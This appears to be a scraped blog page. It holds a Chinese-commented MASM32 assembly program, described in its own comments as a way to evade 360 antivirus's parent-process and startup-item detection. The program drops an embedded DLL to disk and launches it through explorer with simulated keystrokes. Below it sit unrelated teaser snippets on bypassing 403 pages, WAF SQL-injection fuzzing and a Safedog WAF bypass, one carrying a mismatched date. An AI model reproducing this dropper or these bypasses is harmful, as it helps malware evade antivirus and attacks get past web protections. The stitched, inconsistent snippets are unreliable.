;落筆飛花笑百生
;2014.12.9
;過360父程序乙個弱弱的方法
;過360啟動項
.386
.model flat,stdcall
option casemap:none
include windows.inc
includelib kernel32.lib
include kernel32.inc
include user32.inc
includelib user32.lib
include c:\users\巫師\desktop\radasm\masm32\macros\strings.mac
dll equ 105
.const
.data
windowname byte 100 dup (?)
tests byte "c:\program files\tlxsoft\螢幕錄影專家 共享版 v2014\屏錄專家.exe",0
version osversioninfoex<?>
explorerpatch byte "explorer /e, /select, "
exepatch byte "c:\program files\tlxsoft\螢幕錄影專家 共享版 v2014\屏錄專家.exe",0
;exepatch byte 260 dup(?)
dllpatch byte 260 dup (?)
dllname byte "/xx.dll",0
dllpoiter dd 00
dllsize dd 00
filehandle dd 00
filewriteold dd 00
.code
start:
mov eax,offset tests
mov ebx,sizeof tests
add eax,ebx ;這裡已經指向最後乙個00
mov ecx,ebx
xor ebx,ebx
xor edi,edi
lop:
dec eax
mov dl,byte ptr [eax]
cmp dl,'\'
je xx
jmp yy
xx:cmp ebx,0
jne cc
mov ebx,ecx;第乙個\
jmp yy
cc:mov edi,ecx;第二個\
mov ecx,0
jmp loopend
yy:loop lop
loopend:;這裡就已經拿到了位置 edi=正數第乙個\ebx=正數最後乙個\中間的也就是資料夾名字
mov eax,offset tests;首位址拿到手
add eax,edi
add edi,1
sub ebx,edi;長度給ebx
;下面我們要複製字串長度為ebx,起始位址為eax的字串到乙個位置就完成了這裡當然用movs 指令來玩
mov ecx,ebx
cldmov esi,eax
mov edi,offset windowname;這個就是資料夾的名稱記憶體首位址
rep movsb
invoke getcurrentdirectory,260,offset dllpatch
invoke lstrcat,addr dllpatch,addr dllname
invoke createfile,addr dllpatch,generic_write,file_share_write,null,create_always,file_attribute_normal,null
mov filehandle,eax;檔案控制代碼
invoke findresource,null,dll,rt_rcdata
mov dllsize,eax
invoke loadresource,null, dllsize
invoke lockresource,eax
mov dllpoiter,eax;資源位址拿到手
invoke sizeofresource,null, dllsize
mov dllsize,eax;檔案大小拿到手
invoke writefile, filehandle, dllpoiter, dllsize, filewriteold,null
;invoke getmodulefilename,null,offset exepatch,sizeof exepatch
invoke winexec,offset explorerpatch,sw_show
invoke getversionex,offset version
;.if version.dwmajorversion==5 && version.dwminorversion==1;xp系統就不用模擬了直接執行之。。
;jmp yy
;.endif
;yy:
invoke sleep,2000
invoke findwindow,$cta0("cabinetwclass"),offset windowname
mov edx,eax
invoke setforegroundwindow,eax
;;*****
invoke keybd_event,vk_return ,0,keyeventf_extendedkey,0
invoke keybd_event,vk_return ,0,keyeventf_keyup,0
invoke sendmessage,edx,wm_close,0,0
end start
403簡單繞過
403 forbidden 是http協議中的乙個狀態碼 status code 白話理解,沒有許可權訪問此站 該狀態表示伺服器處理了本次請求,但是拒絕執行該務 一般情況站點都是不會允許直接讀取目錄內容的。每當發現403頁面時,這意味著裡面有東西,我們只需要繞過它。繞過403禁止的技術有很多,但在這...
某waf實戰SQL注入繞過fuzz過程
01 環境簡介 伺服器 windows2008 r2 軟體 phpstudy20180211 php 5.4.45 mysql 5.5.53 某鎖win 3.1.18.13服務端版本 02 fuzz過程 以基於union注入為例 fuzz order by 過程如下 id 1 order 不攔截 i...
安全狗最新版繞過測試2023年10月23日
測試版本 iis版v3.3.09476 2014 09 24 apache v3.1.08512 2014 05 29 均為今天能下到的最新版。用於繞過的核心字元 0a,某些特殊場合需要和注釋符配合使用。測試詳細步驟 1 本機安裝了存在注入的v5shop 構架為iis6 aspx mssql2005...